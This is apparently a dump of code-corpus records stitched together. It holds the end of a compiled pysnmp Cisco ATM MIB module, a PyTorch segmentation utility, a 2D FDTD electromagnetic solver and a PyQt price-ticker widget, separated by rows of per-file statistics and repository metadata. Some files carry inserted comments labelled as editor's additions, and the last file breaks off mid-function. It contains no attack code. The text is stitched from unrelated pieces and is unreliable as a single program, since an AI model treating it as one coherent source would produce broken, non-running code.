catmxVclOamEndCCRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 7), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCRetryFreq.setDescription('Specifies OAM End-to-end Continuity check (CC) Activation/Deactivation retry frequency.')
catmxVclOamSegCCActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 8), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCActCount.setDescription('Specifies OAM Segment Continuity check (CC) Activation retry count.')
catmxVclOamSegCCDeActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 9), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCDeActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCDeActCount.setDescription('Specifies OAM Segment Continuity check (CC) Deactivation retry count.')
catmxVclOamSegCCRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 10), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCRetryFreq.setDescription('Specifies OAM Segment Continuity check (CC) Activation/Deactivation retry frequency.')
catmxVclOamManage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 11), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamManage.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamManage.setDescription('Specifies OAM Enable/Disable on the VC. true(1) indicates that OAM is enabled on the VC. false(2) indicates that OAM is disabled on the VC.')
catmxVclOamLoopBkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("sent", 2), ("received", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamLoopBkStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamLoopBkStatus.setDescription('Indicates OAM loopback status of the VC. disabled(1) -- No OAMs on this VC. sent(2) -- OAM sent, waiting for echo. received(3) -- OAM received from target. failed(4) -- Last OAM did not return.')
catmxVclOamVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("downRetry", 1), ("verified", 2), ("notVerified", 3), ("upRetry", 4), ("aisRDI", 5), ("aisOut", 6), ("notManaged", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamVcState.setDescription('Indicates the state of VC OAM. downRetry(1) -- Loopback failed. Retry sending loopbacks with retry frequency. VC is up. verified(2) -- Loopback is successful. notVerified(3) -- Not verified by loopback, AIS/RDI conditions are cleared. upRetry(4) -- Retry successive loopbacks. VC is down. aisRDI(5) -- Received AIS/RDI. Loopback are not sent in this state. aisOut(6) -- Sending AIS. Loopback and reply are not sent in this state. notManaged(7) -- VC is not managed by OAM.')
catmxVclOamEndCCStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 14), OamCCStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamEndCCStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCStatus.setDescription('Indicates OAM End-to-end Continuity check (CC) status.')
catmxVclOamSegCCStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 15), OamCCStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamSegCCStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCStatus.setDescription('Indicates OAM Segment Continuity check (CC) status.')
catmxVclOamEndCCVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 16), OamCCVcState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamEndCCVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCVcState.setDescription('Indicates OAM End-to-end Continuity check (CC) VC state.')
catmxVclOamSegCCVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 17), OamCCVcState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamSegCCVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCVcState.setDescription('Indicates OAM Segment Continuity check (CC) VC state.')
catmxVclOamCellsReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 18), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsReceived.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsReceived.setDescription('Indicates the number of OAM cells received on this VC.')
catmxVclOamCellsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 19), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsSent.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsSent.setDescription('Indicates the number of OAM cells sent on this VC.')
catmxVclOamCellsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 20), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsDropped.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsDropped.setDescription('Indicates the number of OAM cells dropped on this VC.')
catmxVclOamInF5ais = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 21), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamInF5ais.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamInF5ais.setDescription('Indicates the number of received OAM F5 Alarm Indication Signal (AIS) cells from the VC.')
catmxVclOamOutF5ais = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 22), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamOutF5ais.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamOutF5ais.setDescription('Indicates the number of transmitted OAM F5 Alarm Indication Signal (AIS) cells to the VC.')
catmxVclOamInF5rdi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 23), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamInF5rdi.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamInF5rdi.setDescription('Indicates the number of received OAM F5 Remote Detection Indication (RDI) cells from the VC.')
catmxVclOamOutF5rdi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 24), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamOutF5rdi.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamOutF5rdi.setDescription('Indicates the number of transmitted OAM F5 Remote Detection Indication (RDI) cells to the VC.')
ciscoAal5ExtMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2))
ciscoAal5ExtMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1))
ciscoAal5ExtMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2))
ciscoAal5ExtMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1, 1)).setObjects(("CISCO-ATM-EXT-MIB", "ciscoAal5ExtMIBGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBCompliance = ciscoAal5ExtMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: ciscoAal5ExtMIBCompliance.setDescription('This compliance is deprecated in favour of ciscoAal5ExtMIBComplianceRev1. The compliance statement for entities which implement this Cisco AAL5 Extention MIB and support data compression or voice features.')
ciscoAal5ExtMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1, 2)).setObjects(("CISCO-ATM-EXT-MIB", "ciscoAal5ExtMIBGroup"), ("CISCO-ATM-EXT-MIB", "ciscoAtmExtVclOamGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBComplianceRev1 = ciscoAal5ExtMIBComplianceRev1.setStatus('current')
if mibBuilder.loadTexts: ciscoAal5ExtMIBComplianceRev1.setDescription('The compliance statement for entities which implement CISCO-ATM-EXT-MIB.')
ciscoAal5ExtMIBGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2, 1)).setObjects(("CISCO-ATM-EXT-MIB", "cAal5VccExtCompEnabled"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtVoice"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtInF5OamCells"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtOutF5OamCells"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBGroup = ciscoAal5ExtMIBGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoAal5ExtMIBGroup.setDescription('A collection of objects providing AAL5 related parameters.')
ciscoAtmExtVclOamGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2, 2)).setObjects(("CISCO-ATM-EXT-MIB", "catmxVclOamLoopbackFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamUpRetryCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamDownRetryCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCDeActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCDeActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamManage"), ("CISCO-ATM-EXT-MIB", "catmxVclOamLoopBkStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsReceived"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsSent"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsDropped"), ("CISCO-ATM-EXT-MIB", "catmxVclOamInF5ais"), ("CISCO-ATM-EXT-MIB", "catmxVclOamOutF5ais"), ("CISCO-ATM-EXT-MIB", "catmxVclOamInF5rdi"), ("CISCO-ATM-EXT-MIB", "catmxVclOamOutF5rdi"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAtmExtVclOamGroup = ciscoAtmExtVclOamGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoAtmExtVclOamGroup.setDescription('A collection of objects providing Virtual Channel Link (VCL) OAM configuration and state information.')
mibBuilder.exportSymbols("CISCO-ATM-EXT-MIB", catmxVclOamSegCCDeActCount=catmxVclOamSegCCDeActCount, catmxVclOamUpRetryCount=catmxVclOamUpRetryCount, cAal5VccExtVoice=cAal5VccExtVoice, catmxVclOamCellsDropped=catmxVclOamCellsDropped, ciscoAal5ExtMIBGroup=ciscoAal5ExtMIBGroup, catmxVclOamEndCCStatus=catmxVclOamEndCCStatus, catmxVclOamEndCCVcState=catmxVclOamEndCCVcState, catmxVclOamSegCCRetryFreq=catmxVclOamSegCCRetryFreq, ciscoAtmExtMIB=ciscoAtmExtMIB, catmxVclOamSegCCActCount=catmxVclOamSegCCActCount, catmxVclOamLoopBkStatus=catmxVclOamLoopBkStatus, catmxVclOamSegCCStatus=catmxVclOamSegCCStatus, cAal5VccExtTable=cAal5VccExtTable, ciscoAal5ExtMIBCompliance=ciscoAal5ExtMIBCompliance, PYSNMP_MODULE_ID=ciscoAtmExtMIB, cAal5VccExtEntry=cAal5VccExtEntry, catmxVclOamVcState=catmxVclOamVcState, ciscoAtmExtMIBObjects=ciscoAtmExtMIBObjects, catmxVclOamOutF5rdi=catmxVclOamOutF5rdi, ciscoAal5ExtMIBConformance=ciscoAal5ExtMIBConformance, OamCCStatus=OamCCStatus, catmxVclOamTable=catmxVclOamTable, catmxVclOamDownRetryCount=catmxVclOamDownRetryCount, catmxVclOamManage=catmxVclOamManage, catmxVclOamEndCCRetryFreq=catmxVclOamEndCCRetryFreq, ciscoAal5ExtMIBGroups=ciscoAal5ExtMIBGroups, catmxVclOamInF5ais=catmxVclOamInF5ais, cAal5VccExtCompEnabled=cAal5VccExtCompEnabled, OamCCVcState=OamCCVcState, catmxVclOamEndCCActCount=catmxVclOamEndCCActCount, catmxVclOamSegCCVcState=catmxVclOamSegCCVcState, catmxVclOamEntry=catmxVclOamEntry, catmxVclOamEndCCDeActCount=catmxVclOamEndCCDeActCount, catmxVcl=catmxVcl, cAal5VccExtInF5OamCells=cAal5VccExtInF5OamCells, cAal5VccExtOutF5OamCells=cAal5VccExtOutF5OamCells, catmxVclOamOutF5ais=catmxVclOamOutF5ais, ciscoAal5ExtMIBCompliances=ciscoAal5ExtMIBCompliances, catmxVclOamRetryFreq=catmxVclOamRetryFreq, catmxVclOamInF5rdi=catmxVclOamInF5rdi, catmxVclOamCellsReceived=catmxVclOamCellsReceived, catmxVclOamLoopbackFreq=catmxVclOamLoopbackFreq, cAal5VccExtMIBObjects=cAal5VccExtMIBObjects, catmxVclOamCellsSent=catmxVclOamCellsSent, ciscoAtmExtVclOamGroup=ciscoAtmExtVclOamGroup, ciscoAal5ExtMIBComplianceRev1=ciscoAal5ExtMIBComplianceRev1)
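# Hedged sketch (editor's addition): loading this compiled module with
# pysnmp's MIB builder, assuming the file sits on the builder's search path.
from pysnmp.smi import builder

mb = builder.MibBuilder()
mb.loadModules('CISCO-ATM-EXT-MIB')
(oamStatus,) = mb.importSymbols('CISCO-ATM-EXT-MIB', 'catmxVclOamEndCCStatus')
print(oamStatus.getName())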
| 134.179012
| 2,083
| 0.776096
| 1,022
| 0.047017
| 0
| 0
| 0
| 0
| 0
| 0
| 8,161
| 0.375443
|
8bdf0a8fc72d26035fdc4522645b4d01820727b6
| 4,905
|
py
|
Python
|
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
# ckwg +28
# Copyright 2018 by Kitware, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither name of Kitware, Inc. nor the names of any contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import six
import warnings
import numpy as np
import torch
try:
import cv2
except ImportError:
cv2 = None
def bitget(byteval, idx):
return ((byteval & (1 << idx)) != 0)
def label_colormap(N=256):
cmap = np.zeros((N, 3))
for i in six.moves.range(0, N):
id = i
r, g, b = 0, 0, 0
for j in six.moves.range(0, 8):
r = np.bitwise_or(r, (bitget(id, 0) << 7 - j))
g = np.bitwise_or(g, (bitget(id, 1) << 7 - j))
b = np.bitwise_or(b, (bitget(id, 2) << 7 - j))
id = (id >> 3)
cmap[i, 0] = r
cmap[i, 1] = g
cmap[i, 2] = b
cmap = cmap.astype(np.float32) / 255
cmap = (cmap * 255).astype(np.uint8)
return cmap
def label2rgb(lbl, img=None, label_names=None, n_labels=None,
alpha=0.3, thresh_suppress=0):
import skimage.color
if label_names is None:
if n_labels is None:
n_labels = lbl.max() + 1 # +1 for bg_label 0
else:
if n_labels is None:
n_labels = len(label_names)
else:
assert n_labels == len(label_names)
cmap = label_colormap(n_labels)
lbl_viz = cmap[lbl]
lbl_viz[lbl == -1] = (0, 0, 0) # unlabeled
if img is not None:
img_gray = skimage.color.rgb2gray(img)
img_gray = skimage.color.gray2rgb(img_gray)
img_gray *= 255
lbl_viz = alpha * lbl_viz + (1 - alpha) * img_gray
lbl_viz = lbl_viz.astype(np.uint8)
if label_names is None:
return lbl_viz
    # cv2 is required only if label_names is not None; rely on the guarded
    # module-level import instead of re-importing, which would raise here.
    if cv2 is None:
        warnings.warn('label2rgb with label_names requires OpenCV (cv2), '
                      'so ignoring label_names values.')
        return lbl_viz
np.random.seed(1234)
for label in np.unique(lbl):
if label == -1:
continue # unlabeled
mask = lbl.squeeze() == label
if 1. * mask.sum() / mask.size < thresh_suppress:
continue
mask = (mask * 255).astype(np.uint8)
import scipy.ndimage
y, x = scipy.ndimage.center_of_mass(mask)
y, x = map(int, [y, x])
if lbl.squeeze()[y, x] != label:
Y, X = np.where(mask)
point_index = np.random.randint(0, len(Y))
y, x = Y[point_index], X[point_index]
text = label_names[label]
font_face = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.7
thickness = 2
text_size, baseline = cv2.getTextSize(
text, font_face, font_scale, thickness)
def get_text_color(color):
if color[0] * 0.299 + color[1] * 0.587 + color[2] * 0.114 > 170:
return (0, 0, 0)
return (255, 255, 255)
color = get_text_color(lbl_viz[0, 0, y, x])
cv2.putText(lbl_viz[0, 0, :, :], text,
(x - text_size[0] // 2, y),
font_face, font_scale, color, thickness)
return lbl_viz
def transform(img):
mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])
img = img[:, :, ::-1] # RGB -> BGR
img = img.astype(np.float64)
img -= mean_bgr
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
return img
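# Minimal check of transform (editor's addition); assumes an HxWx3 uint8
# RGB input as in the FCN-style preprocessing it mirrors.
dummy = np.zeros((4, 4, 3), dtype=np.uint8)
tensor = transform(dummy)
print(tensor.shape)  # torch.Size([3, 4, 4])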
| 33.367347
| 80
| 0.626504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,698
| 0.346177
|
8bdf61ec1b8d8328f9ce10467e5dc4c43240c500
| 6,421
|
py
|
Python
|
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
fdtd/2d/src/fdtd/solver.py
|
Elena-Torres-Lozano/MCFNL2021
|
b60ecda2dc35fe08ce6cf131c45acc0349dce29c
|
[
"BSD-3-Clause"
] | null | null | null |
import math
import numpy as np
import scipy.constants as sp
import copy
import time
X = 0 # Cartesian indices
Y = 1
L = 0 # Lower
U = 1 # Upper
def gaussian(x, delay, spread):
return np.exp( - ((x-delay)**2 / (2*spread**2)) )
def subsId(id):
if id is None:
return -1
else:
return id-1
class Solver:
class Fields:
def __init__(self, ex, ey, hz):
self.ex = ex
self.ey = ey
self.hz = hz
def get(self):
return (self.ex, self.ey, self.hz)
__timeStepPrint = 5000
def __init__(self, mesh, options, probes, sources):
self.options = options
self._mesh = copy.deepcopy(mesh)
self._probes = copy.deepcopy(probes)
for p in self._probes:
box = self._mesh.elemIdToBox(p["elemId"])
box = self._mesh.snap(box)
ids = self._mesh.toIdx(box)
            Nxy = abs(ids[U] - ids[L])  # cells per axis (U/L bounds, not X/Y)
p["mesh"] = {"origin": box[L], "steps": abs(box[U]-box[L]) / Nxy}
p["indices"] = ids
p["time"] = [0.0]
p["values"] = [np.zeros((Nxy[X], Nxy[Y]))]
# for initial in self._initialCond:
# if initial["type"] == "gaussian":
# position=self._mesh.pos
# values=Solver.movingGaussian(position, 0, \
# sp.speed_of_light,initial["peakPosition"],\
# initial["gaussianAmplitude"], \
# initial["gaussianSpread"] )
# p["values"]= [values[ids[0]:ids[1]]]
# else:
# raise ValueError(\
# "Invalid initial condition type: " + initial["type"] )
self._sources = copy.deepcopy(sources)
for source in self._sources:
box = self._mesh.elemIdToBox(source["elemId"])
ids = mesh.toIdx(box)
source["index"] = ids
self.old = self.Fields(
ex = np.zeros( (mesh.pos[X].size-1, mesh.pos[Y].size ) ),
ey = np.zeros( (mesh.pos[X].size, mesh.pos[Y].size-1) ),
hz = np.zeros( (mesh.pos[X].size-1, mesh.pos[Y].size-1) ) )
def _dt(self):
return self.options["cfl"] * min(self._mesh.steps()) / math.sqrt(2.0)
def timeStep(self):
return self._dt() / sp.speed_of_light
def getProbes(self):
res = self._probes
return res
# ======================= UPDATE E =============================
def _updateE(self, t, dt, overFields = None):
eNew = (np.zeros( self.old.ex.shape ),
np.zeros( self.old.ey.shape ) )
(ex, ey, h) = self.old.get()
e = (ex, ey)
(dX, dY) = self._mesh.steps()
A = dX * dY
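        # Yee-scheme E update from the curl of Hz; note dt/A*dX == dt/dY and
        # dt/A*dY == dt/dX, so these are the usual central differences:
        #   Ex(i,j) += dt/dY * (Hz(i,j) - Hz(i,j-1))   (interior y-nodes)
        #   Ey(i,j) -= dt/dX * (Hz(i,j) - Hz(i-1,j))   (interior x-nodes)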
eNew[X][:,1:-1] = e[X][:,1:-1] + dt/A*dX * (h[:,1:] - h[:,:-1])
eNew[Y][1:-1,:] = e[Y][1:-1,:] - dt/A*dY * (h[1:,:] - h[:-1,:])
# Boundary conditions
for bound in self._mesh.bounds:
xy = bound.orientation()
(lx, ux) = (bound.arrayIdx(L,X), \
bound.arrayIdx(U,X))
(ly, uy) = (bound.arrayIdx(L,Y), \
bound.arrayIdx(U,Y))
if isinstance(bound, self._mesh.BoundPEC):
eNew[xy][lx:ux,ly:uy] = 0.0
else:
raise ValueError("Unrecognized boundary type")
# Subgridding and updating
e[X][:] = eNew[X][:]
e[Y][:] = eNew[Y][:]
# ======================= UPDATE H =============================
def _updateH(self, t, dt):
hNew = np.zeros( self.old.hz.shape )
(ex, ey, h) = self.old.get()
(dX, dY) = self._mesh.steps()
A = dX * dY
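        # Yee-scheme H update from the curl of E:
        #   Hz(i,j) += -dt/dX * (Ey(i+1,j) - Ey(i,j)) + dt/dY * (Ex(i,j+1) - Ex(i,j))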
hNew[:,:] = h[:,:] \
- dt/A * dY * ey[1:, :] \
+ dt/A * dX * ex[ :, 1:] \
+ dt/A * dY * ey[:-1, :] \
- dt/A * dX * ex[ :, :-1]
# Source terms
for source in self._sources:
if source["type"] == "dipole":
magnitude = source["magnitude"]
if magnitude["type"] == "gaussian":
c0 = sp.speed_of_light
delay = c0 * magnitude["gaussianDelay"]
spread = c0 * magnitude["gaussianSpread"]
id = source["index"]
hNew[id[L][X]:id[U][X], id[L][Y]:id[U][Y]] += \
gaussian(t, delay, spread)*dt
else:
raise ValueError(\
"Invalid source magnitude type: " + magnitude["type"])
else:
raise ValueError("Invalid source type: " + source["type"])
h[:] = hNew[:]
def _updateProbes(self, t):
for p in self._probes:
dimensionalTime = t/sp.speed_of_light
writeStep = "samplingPeriod" in p \
and (dimensionalTime/p["samplingPeriod"] >= len(p["time"]))
writeStep = writeStep or "samplingPeriod" not in p
if writeStep:
p["time"].append(dimensionalTime)
idx = p["indices"]
values = np.zeros(tuple(idx[U]-idx[L]))
values[:,:] = \
self.old.hz[ idx[L][X]:idx[U][X], idx[L][Y]:idx[U][Y] ]
p["values"].append(values)
def solve(self, dimensionalFinalTime):
tic = time.time()
t = 0.0
dt = self._dt()
numberOfTimeSteps = \
int(dimensionalFinalTime * sp.speed_of_light / dt)
for n in range(numberOfTimeSteps):
self._updateE(t, dt, self.old)
t += dt/2.0
self._updateH(t, dt)
t += dt/2.0
self._updateProbes(t)
if n % self.__timeStepPrint == 0 or n+1 == numberOfTimeSteps:
                remaining = (time.time() - tic) * \
                    (numberOfTimeSteps-n) / (n+1)
                mins = math.floor(remaining / 60.0)
                secs = remaining % 60.0
                print("    Step: %6d of %6d. Remaining: %2.0f:%02.0f" % (n, \
                    numberOfTimeSteps-1, mins, secs))
print(" CPU Time: %f [s]" % (time.time() - tic))
@staticmethod
def movingGaussian(x,y,t,c,center,A,spread):
return A*np.exp(-(((x-center)-c*t)**2 /(2*spread**2)))
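# Usage sketch (illustrative, not part of the original module): driving the
# solver requires a mesh object exposing pos, steps(), bounds, elemIdToBox(),
# snap() and toIdx() as used above; the names below are hypothetical.
#   solver = Solver(mesh, options={"cfl": 0.8}, probes=probes, sources=sources)
#   solver.solve(dimensionalFinalTime=1e-9)
#   results = solver.getProbes()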
| 33.973545
| 79
| 0.454914
| 6,103
| 0.950475
| 0
| 0
| 125
| 0.019467
| 0
| 0
| 1,069
| 0.166485
|
8bdfa2aafd82d2863e79980ee316f8cecf63acbc
| 2,505
|
py
|
Python
|
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | 3
|
2017-08-24T14:36:49.000Z
|
2018-11-21T21:14:06.000Z
|
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | null | null | null |
myticker.py
|
bitsanity/rateboard
|
f362505d6b9672d2f22bc6e6650975899d2ea127
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys, traceback
import threading
import time
from PyQt4 import QtGui,QtCore
from boardlet import Boardlet
from modellet import Modellet
class MyTicker(Boardlet):
def __init__(self, parent, getbidobj, getaskobj):
super(MyTicker, self).__init__(parent)
self.p_model = MyModel(getbidobj, getaskobj)
self.initUI()
def initUI(self):
super(MyTicker, self).initUI()
self.p_icon = QtGui.QLabel(self)
self.p_icon.setGeometry( self.b_imgx(), self.b_imgy(),
self.b_iconwidth(),self.b_iconheight() )
self.p_icon.setPixmap( QtGui.QPixmap(os.getcwd() + "/img/my.png" ) )
t = threading.Thread(target=self.periodicUpdate)
t.setDaemon(True)
t.start()
def paintEvent(self, e):
super(MyTicker, self).paintEvent(e)
qp = QtGui.QPainter()
qp.begin(self)
qp.setPen( self.p_grayPen )
qp.setFont( self.p_pairFont )
qp.drawText( self.b_col1x(), self.b_row1y(), 'My Prices (USD)' )
qp.setPen( self.p_whitePen )
qp.setFont( self.p_normFont )
qp.drawText( self.b_col1x(), self.b_row2y() - 5,
'buy: ' + self.p_model.getBuy() )
qp.drawText( self.b_col1x(), self.b_row3y() - 5,
'sell: ' + self.p_model.getSell() )
qp.setFont( self.p_timeFont )
qp.setPen( self.p_grayPen )
qp.drawText( self.b_imgx(), self.b_row4y(),
'Refreshed: ' + self.p_model.getLastUpdated() )
qp.end()
def periodicUpdate(self):
        while True:
st = self.getNextWaitTimeSeconds()
time.sleep( st )
self.p_model.doRefresh()
class MyModel(Modellet):
def __init__(self, getbidobj, getaskobj):
self.p_refreshTime = None
self.p_buy = '000.00'
self.p_sell = '000.00'
self.p_bidobj = getbidobj
self.p_askobj = getaskobj
def getBuy(self):
return self.p_buy
def getSell(self):
return self.p_sell
def doRefresh(self):
try:
# calc and apply 1.5% spread to retrieve fee
self.p_buy = "%.2f" % (float(self.p_bidobj.getBid()) * 0.985)
self.p_sell = "%.2f" % (float(self.p_askobj.getAsk()) * 1.015)
